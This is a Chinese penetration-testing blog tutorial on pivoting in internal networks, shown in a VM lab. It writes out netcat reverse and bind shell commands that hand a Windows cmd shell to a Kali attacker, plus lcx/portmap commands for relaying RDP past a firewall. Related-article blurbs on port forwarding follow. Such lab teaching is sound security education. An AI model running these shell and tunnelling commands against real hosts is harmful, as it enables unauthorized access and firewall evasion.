代理转发&端口转发

原创 于 2025-09-29 22:11:27 发布 · 1k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

前言

      web看腻了,我们就看一下内网的内容吧,内网渗透中有一个很重要的点,就是代理转发,怎么一层一层从边界主机一步一步访问到更深层的内网,这是每个渗透人员必须掌握的事情。

准备

      这里我们使用四台虚拟机,笔者这里用的是kali,windows 7,windows server 2016,还有ubuntu。

这里用到三个办法,分别是nc,lcx,frp。

操作

      在此之前,我们首先要明白两个概念,正向代理与方向代理,这里我将以nc协助来将明白这两个概念。

nc

反向代理

       什么叫做反向代理呢,这里我用kali与win2016来讲解,我现在想把win2016的shell弹到kali上,现在我们面临两种选择,一是我们主动使用kali来访问win2016以此来吧win2016的shell获取,二是可以让我们的win2016主动访问我们的kali来获取win2016的shell(这里我们的kali为攻击者,win2016为受害者)。反向代理就是让win2016来访问kali来获取shell,就是上面我们提到的第二种方法。

这里我们用nc来演示。

输入以下命令

nc -lvvp 9999

这里我们现在kali上监听我们的9999端口

这条命令在做什么(逐项解释)

  • nc:netcat,常见的“网络瑞士军刀”小工具,可以读写网络连接的标准入/出。

  • -l:listen,让 netcat 在本机监听(等待对端来连)。

  • -v:verbose(详细模式),显示更多连接信息。命令里是 -vv,表示更高的冗长输出(比一个 -v 更详细)。

  • -p 9999:指定本地端口为 9999-p 表示 port)。

  • 9999:也可以直接作为端口参数(有的 netcat 版本不需要 -p),总之目标是 监听 TCP 端口 9999

然后转到我们的win2016

输入以下命令

nc.exe -e cmd kali的ip与端口

我这里kali的ip为192.168.43.74 监听端口为9999,所以我输入的命令为nc.exe -e cmd 192.168.43.74 9999

然后回车,观察我们的kali

发现win2016的shell成功上线。

正向代理

我们依然用kali来接受shell只不过变成了kali主动访问win2016,也就是在win2016上开启监听。

我们在win2016输入以下命令

nc.exe -l -p 6666 -e cmd.exe

代表我们在win2016上开启监听6666端口。

接下来我们用kali来主动访问我们的win2016从而拿到shell。我们在kali上输入以下命令

nc -nvv 192.168.43.179 6666//这里输入自己的winIP,和上述内容一样

结果我们成功获取到shell

这就是反向代理和正向代理。

lcx

这里我们涉及端口转发

端口转发

什么是端口转发呢,它其实包括远程端口转发和本地端口转发,两者区别仅仅是转发本机的两个端口,还是和其他主机的端口进行转发,原理其实是一样的,就是把一个端口的流量与服务转发到另一个端口,你用主机访问这两个端口所访问到的服务是相同的。接下来我将实操展示。

本地端口转发

我们把portmap(端口转发工具,没有的话可以私信问我要)

我们在kali中输入以下命令

./portmap -m 2 -p1 1111 -p2 2222

意思就是把我们本机的2222端口的流量转发到本机1111上。

然后输入netstat -antp可以看到我们的1111端口和2222端口已经开启监听。

远程端口转发

这时候我们的win2016也要派上用场了

我们确保我们的win2016开启RDP服务默认端口为3389,我们用远程桌面来测试一下我们的两个端口是否成功转发。

输入netstat -ano就可以看到我们开放的端口情况了。

然后我们在kali中输入以下命令

./portmap -m 1 -p1 666 -h2 192.168.43.179(这里输入自己win2016ip) -p2 3389

看见上图即为连接成功。

然后在kali中远程连接一下我们的win2016,我们以前连接win2016是不是得连接它的IP和3389端口,但是因为我们现在已经将win2016的3389的流量转发到kali的127.0.0.1的666端口,所以我们直接访问127.0.0.1:666就可以了,出现一下结果表明流量转发成功。

在举一个例子(反向连接)

我们在win2016输入以下命令

lcx.exe -slave 192.168.43.74 6666 192.168.43.179 3389

然后win2016就会一直循环发两条命令

然后你在kali中输入以下命令

./portmap -m 1 -p1 3333 -p2 6666

其实这就是个本地端口转发,当你输入这条命令后,发现win2016的那两条命令不再循环,说明成功。而且这个是反向连接。

我再举个正向连接的例子。

我们再win2016输入以下命令

lcx.exe -tran 81 127.0.0.1 3389

这个命令的意思是我们把win2016的3389服务转发到win2016的81端口上,然后我们用kali直接访问win2016的81端口就可以远程连接了。

这样在对方有防火墙不让我们访问3389,我们就可以绕过它的防火墙直接访问81端口进而访问3389的服务了

写在后面

原本准备代理链也在这篇文章讲来着,写不动了,就明天专门写一篇文章吧。

d1nosuar
关注
[隧道代理] 隧道代理端口转发 - SSH 端口转发
Blue17 の 小窝
02-11 2421
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络中安全地执行远程登录、命令执行和文件传输等操作。SSH 工具是用于实现 SSH 协议的客户端或服务端软件,SSH 工具可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP 和端口转发等功能。参数含义-C请求压缩所有数据-D动态转发、即 Socks 代理-f后台执行 SSH 命令-g允许远程主机连接主机的转发端口-L本地转发-N不执行远程指令,处于等待状态-R远程转发
端口转发
weixin_44478009的博客
01-07 543
目标主机IP:192.168.222.63 目标端口:81 代理主机IP:192.168.222.145 代理端口:15001 Windows 以管理员身份运行cmd,执行以下命令 netsh interface portproxy add v4tov4 listenaddress=192.168.222.145 listenport=15001 connectaddress=192.168....
端口转发(Port Forwarding)逻辑图解+实践详解
最新发布
weixin_42271802的博客
07-21 1258
用协议栈代码框架再说明一下:
正反向代理端口转发技术详解.pptx
09-03
【正反向代理端口转发技术详解】 正反向代理是网络服务中常见的两种技术,主要用于优化资源分配、提高安全性和负载均衡。代理服务器作为客户端与目标服务器之间的中介,处理来自客户端的请求并转发到相应的服务器...
iox:端口转发和Intranet代理的工具
03-21
用于端口转发和Intranet代理的工具,就像lcx / ew ,但效果更好 为什么写? lcx和ew很棒,但是可以改进。 当我第一次使用它们时,我很长一段时间都不记得这些复杂的参数,例如tran, slave, rcsocks, sssocks...工作...
Nginx服务器中配置非80端口端口转发方法详解
01-10
nginx可以很方便的配置成反向代理服务器:  server {  listen 80;  server_name localhost;  location / {  proxy_pass http://x.x.x.x:9500;  proxy_set_header Host $host:80;  proxy_set_header X-Real-...
端口转发工具
11-02
端口转发工具,用于服务器与前置机之间的端口转发,绿色安全。
iptables 端口转发
07-02
iptables是一个Linux下优秀的nat+防火墙工具
端口转发(Port Forwarding)
qq_69100706的博客
04-24 1594
端口转发(Port Forwarding)又称为端口映射,是一种网络技术,它允许网络设备(如路由器或防火墙)接收来自外部网络的请求,并将这些请求转发给内部网络中的特定主机或服务。需要注意的是,为了安全起见,在配置端口转发时,应尽量遵循最小权限原则,只公开必要的服务和端口,并结合防火墙规则及其他安全措施,以防止不必要的安全风险。: 管理员可以灵活地配置端口转发规则,只允许特定类型的网络流量通过,增强了网络的安全性,防止未经授权的访问。
关于端口转发
技术斋
10-06 1034
在网吧通过路由器或者代理连接到外网,而在内网建立和运行网络服务器或FTP服务器是没办法使外网用户直接访问的,通过在路由上的NAT开启建立相应端口转发的映射,你可以指示路由器转发对某一特定网端口(如80 ,为网络服务器或21为FTP服务器) 所有的信息为本地网络。 这意味着,如果一
服务器端口转发
qq1358223058的博客
05-14 902
服务器端口转发
Linux端口转发
yanggd1987的专栏
10-29 2039
linux下通常我们使用iptables来实现端口转发,需要了解DNAT和SNAT的原理,比较繁琐;而利用Rinetd工具就可以轻易实现,并且可以生成log方便检查,下面我们就来介绍下。Rinetd简介 Rinetd是为在一个Unix和Linux操作系统中为重定向传输控制协议(TCP)连接的一个工具。Rinetd是单一过程的服务器,它处理任何数量的连接到在配置文件etc/rinetd中指定的地址/
SSH端口转发
代码的世界
09-23 598
环境:suse12sp2 + ldap2.4.41 使用yast users进入LDAP用户时,报如下错误 A possible reason for the failed connection may be that your client is configured for TLS/SSL but the server does not support it 使用debug模式,看到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值